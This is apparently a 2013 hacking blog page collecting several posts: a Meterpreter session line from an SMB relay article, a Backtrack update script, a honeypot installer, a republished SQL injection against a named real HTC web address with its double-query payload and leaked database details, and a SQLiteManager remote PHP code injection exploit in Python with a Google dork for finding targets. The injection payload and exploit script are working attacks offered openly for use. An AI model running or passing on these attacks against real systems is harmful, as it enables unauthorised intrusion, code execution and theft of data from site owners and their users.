    [*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.101:1059) at 2012-11-26
    11:54:18 -0600


Source: http://www.netspi.com/blog/2012/12/26/executing-smb-relay-attacks-via-sql-server-using-metasploit/




If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jan 27, 2013

Update script for Backtrack 5 R3 Tool

I'm create the update script for update the tools in your Backtrack 5 R3, try it.

1. Download from https://www.dropbox.com/s/4mkel34ih88dic2/update-script.sh
2. Give it the permission
chmod +x update-script.sh  

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

honeypot-setup-script - Setup honeypot on your server in 3 minutes

A script to install and deploy a honeypot automatically and without user interaction.
Currently installs and sets up:
  • kippo
  • dionaea
  • p0f
These will all be installed as system services so running this script once should turn a vanilla install in to a robust honeypot. Aims to use useful and secure defaults. 

Source:  https://github.com/andrewmichaelsmith/honeypot-setup-script/


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

HTC website was hacked via SQL Injection

If you want to see information leak of this news, please go to the Source. 
 
 http://learning-development.htc.com/index.php?op=UserAuthCandidate

 [+] MySQL Injection Double Query Syntax :
 
 {POST} CandidateID=' and(select 1 from(select count(*),concat((select(
concat(0x3d3d3e,0x27,cast(database() as char),0x27,0x7e))
 from information_schema.tables limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
 and '1'='1 &CID='&FName='&Name=' {POST}


 [+] DataBase Version     :   5.0.45
 [+] Current DataBase      :  uniprosi_htc
 [+] Others DB's            :   information_schema, test
 [+] System User            :   unipros_htc@localhost
 
 
 
Source: http://pastehtml.com/view/cqb4o9yuo.html 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

SQLiteManager 0Day Remote PHP Code Injection Vulnerability

Google Dork: intitle:SQLiteManager inurl:sqlite/
Date: 23/01/2013
Exploit Author: RealGame
Vendor Homepage: http://www.Relagame.co.il
Software Link: http://sourceforge.net/projects/sqlitemanager/
Version: <=1.2.4
Tested on: Windows XP, Debian 2.6.32-46
CVE: N/A
===============================================================
Vulnerable Softwares:
 
Name: SQLiteManager
Official Site: http://www.sqlitemanager.org/
 
Name: Ampps
Official Site: http://www.ampps.com/
 
Name: VertrigoServ
Official Site: http://vertrigo.sourceforge.net/
===============================================================
About Software:
Official Site: http://www.sqlitemanager.org/
SQLiteManager is a database manager for SQLite databases. You can manage
any SQLite database created on any platform with SQLiteManager.
===============================================================
Easy Way To Fix:
Find: SQLiteStripSlashes($_POST['dbpath'])
Replace: str_replace('.', '', SQLiteStripSlashes($_POST['dbpath']))
On File: ./include/add_database.php
===============================================================
 
import re
import urllib2
from urllib import urlencode
from sys import argv, exit
 
def strip_tags(value):
    #Strip tags with RegEx
    return re.sub('<[^>]*?>', '', value)
 
def getDbId(sqliteUrl, myDbName):
    #Find Components
    htmlRes = urllib2.urlopen(sqliteUrl, None, 120).read()
    if htmlRes:
        #If you found it take all the rows
        td = re.findall('<td class="name_db">(.*?)</td>', htmlRes, re.DOTALL)
        #Make a dict of stripped columns
        for element in td:
            if strip_tags(element) == myDbName:
                #Return Id
                return "".join(re.findall('\?dbsel=(.*?)"', element, re.DOTALL))
    return None
 
def main():
    print \
        'SQLiteManager Exploit\n' + \
        'Made By RealGame\n' + \
        'http://www.RealGame.co.il\n'
     
    if len(argv) < 2:
        #replace('\\', '/') - To Do The Same In Win And Linux
        filename = argv[0].replace('\\', '/').split('/')[-1]
         
        print 'Execute Example: ' + filename + ' http://127.0.0.1/sqlite/\n'
        exit()
     
    sqliteUrl = argv[1]    
    myDbName  = "phpinfo"
    myDbFile  = "phpinfo.php"
    #Create Database
    params = {'dbname'      : myDbName,
              'dbVersion'   : '2',
              'dbRealpath'  : None,
              'dbpath'      : myDbFile,
              'action'      : 'saveDb'}
    urllib2.urlopen(sqliteUrl + "main.php", urlencode(params), 120)
    #Get Database ID
    dbId = getDbId(sqliteUrl + "left.php", myDbName)
    #If Database Created
    if dbId:
        #Create Table + Shell Creator
        params = {'DisplayQuery'    : 'CREATE TABLE temptab ( codetab text );\n' + \
                                      'INSERT INTO temptab VALUES (\'<?php phpinfo(); unlink(__FILE__); ?>\');\n',
                  'sqlFile'         : None,
                  'action'          : 'sql',
                  'sqltype'         : '1'}
 
Source: http://packetstormsecurity.com/files/119836 
If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |